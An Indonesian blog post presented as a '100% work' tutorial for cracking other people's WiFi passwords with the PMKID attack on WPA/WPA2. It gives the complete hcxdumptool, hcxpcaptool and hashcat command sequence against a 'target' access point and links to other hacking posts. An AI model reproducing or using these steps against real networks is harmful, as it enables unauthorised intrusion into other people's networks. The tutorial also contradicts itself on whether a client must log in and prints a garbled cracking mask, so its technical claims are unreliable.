Menu Tutup

Cara Hack Password WiFi di Kali Linux 2019 100% Work

Seorang peneliti keamanan mengungkapkan ‘teknik hack WiFi baru yang membuatnya lebih mudah bagi hacker untuk hack password.

Tool hack password Hashcat yang populer, Jens ‘Atom’ Steube, secara eksplisit bekerja melawan protokol jaringan nirkabel WPA / WPA2 dengan fitur roaming yang diaktifkan berdasarkan Pairwise Master Key Identifier (PMKID).

Steube secara tidak sengaja menemukan serangan untuk mengkompromikan jaringan WiFi berkemampuan WPA / WPA2 sambil menganalisis standar keamanan WPA3 yang baru diluncurkan.

Metode hack WiFi baru ini berpotensi memungkinkan penyerang untuk mengambil kata sandi login pre-shared key (PSK), yang memungkinkan mereka untuk meretas ke jaringan Wi-Fi Anda dan.

Cara Hack Password WiFi Menggunakan PMKID

Catatan: Anda harus menunggu seseorang / pemilik wifi login untuk mengakses WiFi yang akan Anda hack.

BACA JUGA  Chromepass - Hack Password yang Tersimpan di Google Crome

Serangan baru tidak mengharuskan pengguna lain untuk menangkap kredensial di jaringan target.

Robust Security Network adalah protokol untuk komunikasi aman melalui jaringan nirkabel 802.11 dan salah satu kemampuannya adalah PMKID, kunci untuk menghubungkan klien ke titik akses.

Langkah 1– Gunakan tool, seperti hcxdumptool (v4.2.0 atau lebih tinggi), untuk meminta PMKID dari titik akses target dan membuang frame yang diterima ke dalam file.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

Langkah 2– Output frame (dalam format pcapng) kemudian dapat dikonversi ke format hash yang diterima Hashcat menggunakan tool hcxpcaptool.

$ ./hcxpcaptool -z test.16800 test.pcapng

Langkah 3– Untuk mendapatkan kata sandi WPA PSK (Pre-Shared Key), gunakan tool hack password Hashcat (v4.2.0 atau lebih tinggi), dan bingo.

BACA JUGA  Script Hack IG MBF Multi Brute Forcing Instagram

Masukn perintah berikut:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

Ini adalah perintah pemindai kata sandi WiFi, yang dapat memakan waktu tergantung pada panjang dan kerumitannya. “Kami tidak tahu vendor mana atau berapa banyak router teknik ini akan bekerja untuk saat ini, tetapi kami pikir itu akan bekerja terhadap semua jaringan 802.11i / p / q / r dengan fungsi roaming yang diaktifkan (sebagian besar router modern),”.

Catatan:

Cara Hack WiFi ini hanya bekerja pada jaringan dengan fungsi roaming yang diaktifkan dan akan 100% berhasil jika seseorang melakukan aktifitas login akses ke jaringan WiFi tersebut.

Cara hack WiFi ini tidak bekerja terhadap protokol keamanan nirkabel WPA3 generasi berikutnya, karena protokol baru “jauh lebih sulit untuk diserang karena protokol pembentukan kunci modern yang disebut” Simultan Otentikasi Setara “(SAE).”

BACA JUGA  Cara Upload File ke GitHub (Project Code)

Tinggalkan Balasan